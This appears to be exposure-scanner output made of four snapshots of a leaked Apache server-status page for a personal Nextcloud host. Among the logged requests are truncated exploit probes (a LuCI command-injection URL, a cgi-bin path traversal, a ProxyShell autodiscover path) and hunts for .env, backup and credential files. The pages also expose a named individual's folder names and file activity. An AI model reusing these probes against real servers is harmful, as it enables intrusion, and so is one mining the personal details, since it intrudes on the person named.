HTTP/1.1 1-306-0/0/6777. 0.009684308983320.00.001537.39 185.171.84.36h2ravignon.mycloud.paris:443[0/0] init 1-306-0/0/7415. 0.00968431689350360.00.001701.43 134.209.25.199http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 1-306-0/0/6786. 0.009684319405130.00.001288.23 134.209.25.199http/1.1 1-306-0/0/8796. 0.009684309515170.00.001498.02 54.37.79.75http/1.1 1-306-0/0/7053. 0.009684309241950.00.001647.08 185.171.84.36h2ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/2.0 1-306-0/0/9258. 0.00968431289350510.00.001821.60 134.209.25.199http/1.1ravignon.mycloud.paris:443GET /.DS_Store HTTP/1.1 1-306-0/0/7293. 0.009684319126730.00.001349.25 54.37.79.75http/1.1 1-306-0/0/7702. 0.009684319513850.00.001685.18 198.235.24.24http/1.1localhost:80GET / HTTP/1.0 1-306-0/0/7801. 0.009684328953290.00.001950.69 185.171.84.36h2ravignon.mycloud.paris:443[0/0] init 1-306-0/0/7254. 0.009684309510440.00.004049.23 54.37.79.75http/1.1 1-306-0/0/6917. 0.00968431869405820.00.002084.19 146.190.150.26http/1.1ravignon.mycloud.paris:443GET /ab2g HTTP/1.1 1-306-0/0/8664. 0.009684309165920.00.001620.22 172.212.59.78http/1.1localhost:80GET /hudson HTTP/1.1 1-306-0/0/6660. 0.009684309293080.00.001149.69 185.171.84.36h2ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/2.0 1-306-0/0/7435. 0.009684309149530.00.001358.25 185.171.84.36h2ravignon.mycloud.paris:443[0/0] init 1-306-0/0/7538. 0.009684319529820.00.001837.41 45.65.9.39h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 1-306-0/0/6563. 0.009684318968000.00.001999.76 5.34.178.101http/1.1 1-306-0/0/6979. 0.009684308938540.00.002342.93 149.50.103.48http/1.1localhost:80GET / HTTP/1.1 1-306-0/0/6674. 0.0096843011957260.00.001956.92 185.224.128.83http/1.1localhost:80GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&co 1-306-0/0/7634. 0.009684309128770.00.001898.25 185.224.128.59http/1.1localhost:80GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&co 1-306-0/0/6715. 0.009684309398190.00.003150.97 146.190.150.26http/1.1 1-306-0/0/6915. 0.009684329351270.00.003638.75 185.191.126.213http/1.1localhost:80GET / HTTP/1.1 1-306-0/0/6836. 0.0096843849430600.00.001229.99 146.190.150.26http/1.1ravignon.mycloud.paris:443GET / HTTP/1.0 1-306-0/0/6656. 0.00968432319170350.00.001602.22 134.209.25.199http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 2-30825626480/3/2338_ 0.461203352350.00.0424.94 212.102.40.218http/1.1 2-30825626480/9/2309_ 1.06923514460.00.0140.86 146.190.103.103http/1.1 2-30825626480/4/2309_ 0.61100
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31933c4805933c48057c1786d8
Apache Status Apache Server Status for ravignon.mycloud.paris (via 192.168.145.253) Server Version: Apache/2.4.52 (Ubuntu) OpenSSL/3.0.2 Server MPM: event Server Built: 2023-10-26T13:44:44 Current Time: Sunday, 22-Sep-2024 17:43:06 UTC Restart Time: Friday, 24-Nov-2023 06:59:39 UTC Parent Server Config. Generation: 306 Parent Server MPM Generation: 305 Server uptime: 303 days 10 hours 43 minutes 26 seconds Server load: 0.00 0.00 0.00 Total accesses: 526169 - Total Traffic: 59.3 GB - Total Duration: 76820778 CPU Usage: u866.97 s1702.41 cu5637.81 cs1553.05 - .0372% CPU load .0201 requests/sec - 2426 B/second - 118.1 kB/request - 146 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 12549989no0yes025000 32549990no0yes124000 Sum200 149000 ........................._________________________.............. ...........________________________W............................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-301-0/0/5565. 0.0032298318788700.00.00105.75 185.191.126.213http/1.1localhost:80GET / HTTP/1.1 0-301-0/0/5512. 0.0032298318110840.00.0082.02 57.129.23.166http/1.1localhost:80POST / HTTP/1.1 0-301-0/0/5628. 0.0032298318560590.00.0093.84 162.142.125.219http/1.1 0-301-0/0/5562. 0.0032298328433320.00.00100.97 185.191.126.213http/1.1localhost:80GET / HTTP/1.1 0-301-0/0/5612. 0.0032298308661390.00.00103.11 57.129.23.166http/1.1localhost:80GET /.env HTTP/1.1 0-301-0/0/5677. 0.0032298318713640.00.00123.25 34.135.151.125http/1.1ravignon.mycloud.paris:80GET / HTTP/1.1 0-301-0/0/5595. 0.0032298318415760.00.0075.07 147.185.132.255http/1.1localhost:80\x16\x03\x01 0-301-0/0/5590. 0.003229831958426340.00.0095.75 57.129.23.166http/1.1 0-301-0/0/5490. 0.0032298308518920.00.0089.73 123.163.114.252http/1.1localhost:80GET /favicon.ico HTTP/1.1 0-301-0/0/5616. 0.003229832668968220.00.00171.89 83.222.191.62http/1.1ravignon.mycloud.paris:443GET /geoserver/wfs?service=wfs&version=2.0.0&request=GetPropert 0-301-0/0/5577. 0.0032298328388340.00.0079.16 94.156.71.65http/1.1 0-301-0/0/5546. 0.0032298348335620.00.0070.58 95.214.55.138http/1.1localhost:80GET / HTTP/1.1 0-301-0/0/5634. 0.003229831658805690.00.0091.98 167.94.145.100h2ravignon.mycloud.paris:443[0/0] init 0-301-0/0/5589. 0.0032298338684930.00.0081.71 162.142.125.202http/1.1localhost:80GET / HTTP/1.1 0-301-0/0/5649. 0.00322983868625770.00.0056.01 162.142.125.202http/1.1 0-301-0/0/5659. 0.003229831729095870.00.0095.77 15.235.41.22http/1.1ravignon.mycloud.paris:443POST / HTTP/1.1 0-301-0/0/5572. 0.003229832418746450.00.00129.02 167.94.145.100h2ravignon.mycloud.paris:443[0/0] done 0-301-0/0/5523. 0.0032298328544450.00.00116.29 162.142.125.219http/1.1 0-301-0/0/5548. 0.0032298318302440.00.0089.52 57.129.23.166http/1.1localhost:80POST / HTTP/1.1 0-301-0/0/5481. 0.0032298328753200.00.0088.25 57.129.23.166http/1.1localhost:80POST / HTTP/1.1 0-301-0/0/5506. 0.003229831458262990.00.0064.52 162.142.125.219http/1.1 0-301-0/0/5531. 0.0032298308629450.00.0067.26 57.129.23.166http/1.1 0-301-0/0/5421. 0.0032298308207980.00.0075.30 57.129.23.166http/1.1 0-301-0/0/5548. 0.003229832188637390.00.0091.62 172.168.41.2http/1.1ravignon.mycloud.paris:443GET /autodiscover/autodiscover.json?@zdi/Powershell HTTP/1.1 0-301-0/0/5538. 0.0032298308637570.00.00112.75 167.94.145.100http/1.1 1-30525499890/6/7915_ 1.25603109390330.00.031824.47 8.219.216.114http/1.1ravignon.mycloud.paris:443POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e 1-30525499890/6/7820_ 1.181191809636380.00.041177.85 162.142.125.215h2clocalhost:80[0/0] done 1-30525499890/5/6766_ 0.9311918588983320.00.011537.38 89.95.112.211h2ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/2.0 1-30525499890/5/7404_ 1.171191909345840.00.021701.36 162.142.125.215h2clocalhost:80[0/0] init 1-30525499890/10/6769_ 1.231192419405100.00.051288.20 162.142.125.215http/1.1localhost:80GET / HTTP/1.1 1-30525499890/9/8772_ 1.231220939507350.00.051497.93 185.191.126.213http/1.1localhost:80GET / HTTP/1.1 1-30525499890/4/7040_ 0.921220419235250.00.011647.05 89.95.112.211h2ravignon.mycloud.paris:443[0/0] init 1-30525499890/2/9237_ 0.841220419342560.00.011821.51 64.62.197.27h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 1-30525499890/5/7282_ 1.011192309126700.00.051349.23 162.142.125.215http/1.1 1-30525499890/5/7684_ 1.2137912579512550.00.041685.11 135.125.244.52http/1.1ravignon.mycloud.paris:443GET /.env HTTP/1.1 1-30525499890/5/7786_ 1.13379118953240.00.011950.65 66.240.219.146http/1.1localhost:80GET / HTTP/1.1 1-30525499890/7/7236_ 1.26379609510420.00.084049.19 185.191.126.213http/1.1localhost:80GET / HTTP/1.1 1-30525499890/4/6902_ 1.18380009401000.00.012082.50 81.17.22.122http/1.1 1-30525499890/9/8647_ 0.96462509165890.00.051620.16 170.64.130.197http/1.1 1-30525499890/4/6642_ 1.26462519291090.00.031149.62 93.174.93.12http/1.1localhost:80\x16\x03\x02\x01o\x01 1-30525499890/8/7419_ 1.18603119149520.00.031356.88 45.249.245.54http/1.1localhost:80GET / HTTP/1.1 1-30525499890/10/7522_ 1.221481519519420.00.041837.34 149.50.103.48http/1.1localhost:80GET / HTTP/1.1 1-30525499890/5/6547_ 1.131564118967950.00.031999.71 93.174.93.12http/1.1localhost:80GET / HTTP/1.0 1-30525499890/3/6964_ 0.731564108937150.00.012342.21 89.95.112.211h2ravignon.mycloud.paris:443[0/0] init 1-30525499890/5/6652_ 1.22408111957240.00.021956.89 213.109.202.40http/1.1 1-30525499890/6/7618_ 0.64181119126220.00.021898.18 167.94.145.102http/1.1 1-30525499890/7/6706_ 1.2218181059398180.00.033150.96 80.64.30.188http/1.1ravignon.mycloud.paris:443GET /remote/login HTTP/1.1 1-30525499890/8/6901_ 1.2818182359348870.00.043638.67 167.94.145.102http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 1-30525499890/10/6822_ 0.99148101559423930.00.011229.92 89.95.112.211h2ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/2.0 1-30525499890/5/6640_ 1.091481019160610.00.011602.12 89.95.112.211h2ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/2.0 2-283-0/0/2318. 0.00187818323334110.00.0024.70 95.214.55.138http/1.1localhost:80GET / HTTP/1.1 2-283-0/0/2286. 0.0018781831273507470.00.0040.75 139.162
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31933c4805933c48051986e197
Apache Status Apache Server Status for ravignon.mycloud.paris (via 192.168.145.253) Server Version: Apache/2.4.52 (Ubuntu) OpenSSL/3.0.2 Server MPM: event Server Built: 2023-10-26T13:44:44 Current Time: Friday, 20-Sep-2024 15:35:45 UTC Restart Time: Friday, 24-Nov-2023 06:59:39 UTC Parent Server Config. Generation: 304 Parent Server MPM Generation: 303 Server uptime: 301 days 8 hours 36 minutes 5 seconds Server load: 0.00 0.00 0.00 Total accesses: 524858 - Total Traffic: 59.2 GB - Total Duration: 76768834 CPU Usage: u2566.36 s2036.7 cu3923.35 cs1205.13 - .0374% CPU load .0202 requests/sec - 2442 B/second - 118.3 kB/request - 146.266 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 12541121no1yes124000 32541122no0yes025000 Sum201 149000 .........................__W______________________.............. ..........._________________________............................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-301-0/0/5565. 0.0014254218788700.00.00105.75 185.191.126.213http/1.1localhost:80GET / HTTP/1.1 0-301-0/0/5512. 0.0014254218110840.00.0082.02 57.129.23.166http/1.1localhost:80POST / HTTP/1.1 0-301-0/0/5628. 0.0014254218560590.00.0093.84 162.142.125.219http/1.1 0-301-0/0/5562. 0.0014254228433320.00.00100.97 185.191.126.213http/1.1localhost:80GET / HTTP/1.1 0-301-0/0/5612. 0.0014254208661390.00.00103.11 57.129.23.166http/1.1localhost:80GET /.env HTTP/1.1 0-301-0/0/5677. 0.0014254218713640.00.00123.25 34.135.151.125http/1.1ravignon.mycloud.paris:80GET / HTTP/1.1 0-301-0/0/5595. 0.0014254218415760.00.0075.07 147.185.132.255http/1.1localhost:80\x16\x03\x01 0-301-0/0/5590. 0.001425421958426340.00.0095.75 57.129.23.166http/1.1 0-301-0/0/5490. 0.0014254208518920.00.0089.73 123.163.114.252http/1.1localhost:80GET /favicon.ico HTTP/1.1 0-301-0/0/5616. 0.001425422668968220.00.00171.89 83.222.191.62http/1.1ravignon.mycloud.paris:443GET /geoserver/wfs?service=wfs&version=2.0.0&request=GetPropert 0-301-0/0/5577. 0.0014254228388340.00.0079.16 94.156.71.65http/1.1 0-301-0/0/5546. 0.0014254248335620.00.0070.58 95.214.55.138http/1.1localhost:80GET / HTTP/1.1 0-301-0/0/5634. 0.001425421658805690.00.0091.98 167.94.145.100h2ravignon.mycloud.paris:443[0/0] init 0-301-0/0/5589. 0.0014254238684930.00.0081.71 162.142.125.202http/1.1localhost:80GET / HTTP/1.1 0-301-0/0/5649. 0.00142542868625770.00.0056.01 162.142.125.202http/1.1 0-301-0/0/5659. 0.001425421729095870.00.0095.77 15.235.41.22http/1.1ravignon.mycloud.paris:443POST / HTTP/1.1 0-301-0/0/5572. 0.001425422418746450.00.00129.02 167.94.145.100h2ravignon.mycloud.paris:443[0/0] done 0-301-0/0/5523. 0.0014254228544450.00.00116.29 162.142.125.219http/1.1 0-301-0/0/5548. 0.0014254218302440.00.0089.52 57.129.23.166http/1.1localhost:80POST / HTTP/1.1 0-301-0/0/5481. 0.0014254228753200.00.0088.25 57.129.23.166http/1.1localhost:80POST / HTTP/1.1 0-301-0/0/5506. 0.001425421458262990.00.0064.52 162.142.125.219http/1.1 0-301-0/0/5531. 0.0014254208629450.00.0067.26 57.129.23.166http/1.1 0-301-0/0/5421. 0.0014254208207980.00.0075.30 57.129.23.166http/1.1 0-301-0/0/5548. 0.001425422188637390.00.0091.62 172.168.41.2http/1.1ravignon.mycloud.paris:443GET /autodiscover/autodiscover.json?@zdi/Powershell HTTP/1.1 0-301-0/0/5538. 0.0014254208637570.00.00112.75 167.94.145.100http/1.1 1-30325411210/770/7891_ 1797.8101569384590.01127.571824.31 165.227.173.41http/1.1ravignon.mycloud.paris:443GET /about HTTP/1.1 1-30325411210/685/7791_ 1797.7101029625790.0666.271177.62 167.94.138.119http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 1-30325411211/714/6743W 1796.21008975780.01124.951537.14 165.227.173.41http/1.1ravignon.mycloud.paris:443GET /server-status HTTP/1.1 1-30325411210/859/7378_ 1797.8201389332770.01342.421700.99 165.227.173.41http/1.1ravignon.mycloud.paris:443GET /debug/default/view?panel=config HTTP/1.1 1-30325411210/529/6733_ 1797.6202279390400.0897.231287.93 167.94.138.119h2ravignon.mycloud.paris:443[0/0] init 1-30325411210/587/8743_ 1797.7201899500950.01016.791497.75 167.94.138.119http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 1-30325411210/764/7012_ 1797.662628809157780.01169.181643.90 167.94.138.119http/1.1 1-30325411210/633/9216_ 1797.31263009324520.01125.471821.27 167.94.138.119http/1.1 1-30325411210/559/7255_ 1797.6526322259119090.0812.721348.89 167.94.138.119h2ravignon.mycloud.paris:443[0/0] done 1-30325411210/578/7653_ 1797.532624979496060.01144.791684.81 167.94.138.119http/1.1 1-30325411210/586/7758_ 1797.444272328947830.01201.681950.50 8.215.23.119http/1.1 1-30325411210/1098/7200_ 1797.24262609496170.03372.314048.99 167.94.138.119http/1.1 1-30325411210/623/6873_ 1796.88102709389820.01802.392081.50 104.40.75.97http/1.1 1-30325411210/641/8625_ 1797.54844839159090.01094.901620.02 64.44.156.225http/1.1 1-30325411210/556/6614_ 1797.761979276410.0733.811149.39 165.227.173.41http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 1-30325411210/901/7390_ 1797.5511809137610.0924.071356.64 162.142.125.208http/1.1 1-30325411210/675/7496_ 1797.5712229507250.01367.971837.08 165.227.173.41h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 1-30325411210/655/6517_ 1797.7651618952620.01462.481999.45 93.174.93.12http/1.1localhost:80GET / HTTP/1.0 1-30325411210/764/6942_ 1797.68108929620.01869.972342.03 165.227.173.41http/1.1 1-30325411210/678/6622_ 1797.70119311944740.01419.121956.66 165.227.173.41http/1.1 1-30325411210/794/7588_ 1797.7911529109870.01408.531897.89 165.227.173.41http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 1-30325411210/727/6675_ 1797.8001429380120.02717.773150.65 165.227.173.41http/1.1ravignon.mycloud.paris:443GET /.vscode/sftp.json HTTP/1.1 1-30325411210/748/6872_ 1797.8011649336050.03278.423637.85 165.227.173.41http/1.1ravignon.mycloud.paris:443GET /server HTTP/1.1 1-30325411210/638/6791_ 1797.33109410280.0816.951229.69 74.82.47.2h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 1-30325411210/591/6609_ 1797.41129148820.01230.851601.91 40.118.210.206http/1.1 2-283-0/0/2318. 0.00169774223334110.00.0024.70 95.214.55.138http/1.1localhost:80GET / HTTP/1.1 2-283-0/0/2286. 0.0016977421273507470.00.0040.75 139.162.96.14http/1.1
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31933c4805933c480530c17599
Apache Status Apache Server Status for ravignon.mycloud.paris (via 192.168.145.253) Server Version: Apache/2.4.52 (Ubuntu) OpenSSL/3.0.2 Server MPM: event Server Built: 2023-10-26T13:44:44 Current Time: Wednesday, 18-Sep-2024 16:18:44 UTC Restart Time: Friday, 24-Nov-2023 06:59:39 UTC Parent Server Config. Generation: 302 Parent Server MPM Generation: 301 Server uptime: 299 days 9 hours 19 minutes 5 seconds Server load: 0.11 0.03 0.01 Total accesses: 464327 - Total Traffic: 8.4 GB - Total Duration: 76721908 CPU Usage: u877.39 s1692.13 cu3318.85 cs1053.57 - .0268% CPU load .018 requests/sec - 350 B/second - 19.1 kB/request - 165.232 ms/request 1 requests currently being processed, 74 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 02532170no0yes025000 12531239no0yes025000 32531240no0yes124000 Sum300 174000 __________________________________________________.............. ...........__________W______________............................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-30125321700/78/5559_ 19.29511358786210.00.33105.72 185.117.37.101h2ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/2.0 0-30125321700/80/5504_ 19.315028109160.00.3581.99 185.117.37.101h2ravignon.mycloud.paris:443POST /remote.php/dav/bulk HTTP/2.0 0-30125321700/98/5625_ 19.246428560560.00.3293.83 185.117.37.101h2ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/2.0 0-30125321700/84/5556_ 19.2563638433290.00.26100.94 185.117.37.101h2ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/DOSSIERS%20B 0-30125321700/88/5607_ 19.28551468661390.00.33103.10 185.117.37.101h2ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/Nouveau%20do 0-30125321700/84/5672_ 19.256208711950.00.30123.22 185.117.37.101h2ravignon.mycloud.paris:443MKCOL /remote.php/dav/files/Beatrice%20Ravignon/Nouveau%20dossi 0-30125321700/89/5583_ 19.088218414250.00.3375.05 185.117.37.101h2ravignon.mycloud.paris:443GET /ocs/v2.php/apps/notifications/api/v2/notifications?format= 0-30125321700/86/5588_ 19.1545788424380.00.3395.73 185.117.37.101h2ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/2.0 0-30125321700/79/5482_ 19.3301448518910.00.3289.72 188.166.108.93http/1.1ravignon.mycloud.paris:443GET /v2/_catalog HTTP/1.1 0-30125321700/80/5609_ 19.21451558961910.00.65171.82 185.117.37.101h2ravignon.mycloud.paris:443POST /remote.php/dav/bulk HTTP/2.0 0-30125321700/86/5561_ 19.125508385670.00.2679.11 185.117.37.101h2ravignon.mycloud.paris:443[9/9] done: stream 17, PROPFIND /remote.php/dav/files/Beatrice% 0-30125321700/74/5542_ 19.086408333170.00.2770.55 185.117.37.101h2ravignon.mycloud.paris:443[0/0] init 0-30125321700/82/5624_ 18.1001908804040.00.2091.95 185.117.37.101h2ravignon.mycloud.paris:443[0/0] init 0-30125321700/116/5582_ 19.275818683430.03.5681.67 185.117.37.101h2ravignon.mycloud.paris:443GET /ocs/v2.php/apps/notifications/api/v2/notifications?format= 0-30125321700/76/5647_ 19.2662868625770.00.2256.00 185.117.37.101h2ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/Nouveau%20do 0-30125321700/94/5652_ 19.08029091580.00.2295.72 185.117.37.101h2ravignon.mycloud.paris:443MOVE /remote.php/dav/files/Beatrice%20Ravignon/REMARKABLE/Your% 0-30125321700/87/5568_ 19.07008744010.00.27129.00 185.117.37.101h2ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/REMARKABLE H 0-30125321700/77/5508_ 19.256308544420.00.28116.24 185.117.37.101h2ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/DOSSIERS%20B 0-30125321700/103/5541_ 19.3301538302410.00.2789.49 188.166.108.93http/1.1ravignon.mycloud.paris:443GET /.vscode/sftp.json HTTP/1.1 0-30125321700/91/5472_ 19.295518753170.00.3088.24 185.117.37.101h2ravignon.mycloud.paris:443MOVE /remote.php/dav/files/Beatrice%20Ravignon/Nouveau%20dossie 0-30125321700/71/5501_ 19.1064608261530.00.3064.52 185.117.37.101h2ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/REMARKABLE H 0-30125321700/91/5518_ 19.29501618627360.00.3667.22 185.117.37.101h2ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/GOOGLE HTTP/ 0-30125321700/68/5417_ 19.2955688204590.00.2375.24 185.117.37.101h2ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/Nouveau%20do 0-30125321700/75/5540_ 19.25622028635200.00.3191.59 185.117.37.101h2ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/DOSSIERS%20B 0-30125321700/81/5533_ 19.3401418637570.00.27112.75 188.166.108.93http/1.1ravignon.mycloud.paris:443GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-30125312390/56/5416_ 6.9924919377780.00.2982.83 185.117.37.101h2ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/REMARKABLE/V 1-30125312390/39/5486_ 7.03178799614910.00.2499.19 185.117.37.101h2ravignon.mycloud.paris:443GET /ocs/v2.php/apps/notifications/api/v2/notifications?format= 1-30125312390/42/5485_ 6.352441708972190.00.2694.30 185.117.37.101h2ravignon.mycloud.paris:443[0/0] init 1-30125312390/49/5585_ 6.8517309320280.00.3060.63 185.117.37.101h2ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/2.0 1-30125312390/34/5521_ 6.7118009379220.00.2781.76 185.117.37.101h2ravignon.mycloud.paris:443[0/0] init 1-30125312390/45/5434_ 6.8729819481380.00.2793.27 185.117.37.101h2ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/2.0 1-30125312390/49/5505_ 6.7118029148040.00.2858.01 185.117.37.101h2ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/2.0 1-30125312390/50/5540_ 6.9024409318070.00.33131.73 185.117.37.101h2ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/2.0 1-30125312390/46/5556_ 7.0217909111390.00.3493.37 185.117.37.101h2ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/Microsoft%20 1-30125312390/38/5525_ 6.882501639494070.00.2658.22 185.117.37.101h2ravignon.mycloud.paris:443GET /ocs/v2.php/apps/user_status/api/v1/user_status?format=json 1-30125312390/41/5468_ 6.9629818940790.00.2993.97 185.117.37.101h2ravignon.mycloud.paris:443GET /ocs/v2.php/apps/notifications/api/v2/notifications?format= 1-30125312390/47/5412_ 7.0317929390650.00.2496.13 185.117.37.101h2ravignon.mycloud.paris:443MOVE /remote.php/dav/files/Beatrice%20Ravignon/Microsoft%20365% 1-30125312390/45/5546_ 7.0511459383220.00.27106.80 188.166.108.93http/1.1ravignon.mycloud.paris:443GET /server HTTP/1.1 1-30125312390/39/5458_ 6.9924909154170.00.2893.27 185.117.37.101h2ravignon.mycloud.paris:443MOVE /remote.php/dav/files/Beatrice%20Ravignon/REMARKABLE/Verif 1-30125312390/47/5484_ 7.0217909269800.00.2093.94 185.117.37.101h2ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/Microsoft%20 1-30125312390/52/5370_ 7.011791539130650.00.2893.00 185.117.37.101h2ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/2.0 1-30125312390/51/5530_ 7.0411829499230.00.3088.63 188.166.108.93http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 1-30125312390/36/5351_ 6.621731528948220.00.2296.48 185.117.37.101h2ravignon.mycloud.paris:443[0/0] init 1-30125312390/41/5391_ 6.992501598923890.00.23126.12 185.117.37.101h2ravignon.mycloud.paris:443PROPFIND /remote
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31933c4805933c4805de7de9a4
Apache Status Apache Server Status for ravignon.mycloud.paris (via 192.168.145.253) Server Version: Apache/2.4.52 (Ubuntu) OpenSSL/3.0.2 Server MPM: event Server Built: 2023-10-26T13:44:44 Current Time: Monday, 16-Sep-2024 11:42:52 UTC Restart Time: Friday, 24-Nov-2023 06:59:39 UTC Parent Server Config. Generation: 300 Parent Server MPM Generation: 299 Server uptime: 297 days 4 hours 43 minutes 12 seconds Server load: 0.00 0.00 0.00 Total accesses: 455988 - Total Traffic: 8.4 GB - Total Duration: 75430253 CPU Usage: u849.91 s1668.38 cu3281.8 cs1043.16 - .0267% CPU load .0178 requests/sec - 349 B/second - 19.2 kB/request - 165.422 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 12522493no0yes025000 32522494no0yes124000 Sum200 149000 ........................._________________________.............. ..........._____W___________________............................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-283-0/0/5481. 0.00133816908720280.00.00105.38 103.121.39.54h2ravignon.mycloud.paris:443GET /logs/debug.log HTTP/2.0 0-283-0/0/5424. 0.00133816918059590.00.0081.64 103.121.39.54h2ravignon.mycloud.paris:443GET /errors.log HTTP/2.0 0-283-0/0/5527. 0.00133816908496030.00.0093.51 103.121.39.54h2ravignon.mycloud.paris:443GET /backup.sql HTTP/2.0 0-283-0/0/5472. 0.00133816908377100.00.00100.68 103.121.39.54h2ravignon.mycloud.paris:443[6858/6858] done 0-283-0/0/5519. 0.00133816928579270.00.00102.77 103.121.39.54h2ravignon.mycloud.paris:443GET /htdocs/index.php HTTP/2.0 0-283-0/0/5588. 0.00133816908636270.00.00122.92 103.121.39.54h2ravignon.mycloud.paris:443GET /debug/default/view?panel=views HTTP/2.0 0-283-0/0/5494. 0.00133816908343630.00.0074.72 103.121.39.54h2ravignon.mycloud.paris:443GET /tmp/debug.log HTTP/2.0 0-283-0/0/5502. 0.0013381692448350640.00.0095.40 103.121.39.54h2ravignon.mycloud.paris:443GET /debug/default/view?panel=events HTTP/2.0 0-283-0/0/5403. 0.00133816928456620.00.0089.40 103.121.39.54h2ravignon.mycloud.paris:443[6834/6834] done: stream 13667, GET /.idea 0-283-0/0/5529. 0.0013381691378898780.00.00171.17 103.121.39.54h2ravignon.mycloud.paris:443GET /debug/default/view?panel=security HTTP/2.0 0-283-0/0/5475. 0.0013381691348336540.00.0078.86 103.121.39.54h2ravignon.mycloud.paris:443GET /debug/default/view?panel=profiling HTTP/2.0 0-283-0/0/5468. 0.00133816908281790.00.0070.27 103.121.39.54h2ravignon.mycloud.paris:443GET /assets/debug.log HTTP/2.0 0-283-0/0/5542. 0.0013381692638765250.00.0091.75 103.121.39.54h2ravignon.mycloud.paris:443GET /log/debug.log HTTP/2.0 0-283-0/0/5466. 0.00133816908614240.00.0078.11 103.121.39.54h2ravignon.mycloud.paris:443GET /debug/default/view?panel=log HTTP/2.0 0-283-0/0/5571. 0.00133816908573160.00.0055.78 103.121.39.54h2ravignon.mycloud.paris:443GET /cache/debug.log HTTP/2.0 0-283-0/0/5558. 0.0013381692539052910.00.0095.51 83.97.73.245http/1.1ravignon.mycloud.paris:443GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1 0-283-0/0/5481. 0.0013381691348670760.00.00128.73 